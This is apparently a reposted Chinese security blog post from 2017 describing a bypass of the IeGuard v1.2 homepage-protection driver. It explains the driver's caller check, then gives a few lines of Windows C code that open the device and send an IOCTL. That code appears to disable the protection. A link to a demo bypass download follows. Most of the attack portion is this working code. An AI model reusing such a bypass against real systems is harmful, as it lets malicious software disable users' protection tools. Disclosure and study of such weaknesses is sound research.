四行代码绕过首页巡警v1.2 's

2017年5月8日09:03:04评论500 views字数 482阅读1分36秒阅读模式

摘要

作者：MJ0011
来源：MJ0011的内核驱动研究所首页巡警v1.2版加入了一个校验，在发送IRP_MJ_CREATE请求到其驱动时，会打开当前进程的 SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行校验，若不是IeGuard的话，就拒绝操作其驱动

作者：MJ0011
来源：MJ0011的内核驱动研究所

首页巡警v1.2版加入了一个校验，在发送IRP_MJ_CREATE请求到其驱动时，会打开当前进程的 SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行校验，若不是IeGuard的话，就拒绝操作其驱动

不过，同样非常轻易可以绕过

代码如下：
GetModuleFileName(0 , filename , MAX_PATH);
CreateFile( filename ,
FILE_READ_DATA ,
FILE_SHARE_DELETE,
0,
OPEN_EXISTING ,
0,
0);

HANDLE hdev = CreateFile(“////.//IEGuard” ,
FILE_READ_ATTRIBUTES ,
0 ,
0,
OPEN_EXISTING ,
0 ,
0
);

DeviceIoControl(hdev ,
0x50000408 ,
0 , 0 , 0 , 0 , &retlen , 0 );

测试程序下载:

http://mj0011.ys168.com/

漏洞演示下BypassIeGuard12.rar

左青龙
微信扫一扫

右白虎
微信扫一扫

四行代码绕过首页巡警v1.2 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信